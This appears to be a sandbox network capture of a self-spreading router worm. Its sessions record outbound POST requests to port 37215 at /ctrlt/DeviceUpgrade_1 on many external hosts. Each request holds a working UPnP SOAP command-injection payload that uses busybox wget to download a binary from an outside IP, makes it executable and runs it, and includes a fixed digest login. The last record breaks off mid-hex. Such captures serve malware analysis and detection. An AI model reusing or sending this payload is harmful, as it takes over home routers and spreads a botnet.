                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  67192.168.2.135757858.171.237.9137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.653173923 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  68192.168.2.1335836178.234.84.15137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.653202057 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  69192.168.2.1338788197.75.116.11537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.653234959 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  70192.168.2.135946241.137.31.1637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.653302908 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  71192.168.2.135447257.2.111.21537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.653304100 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  72192.168.2.135365441.135.106.15437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.653345108 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  73192.168.2.1343150197.66.192.6237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.653363943 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  74192.168.2.134871241.152.215.13537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.653364897 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  75192.168.2.1348358157.133.35.2337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.653366089 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  76192.168.2.135223841.4.113.22437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.653405905 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 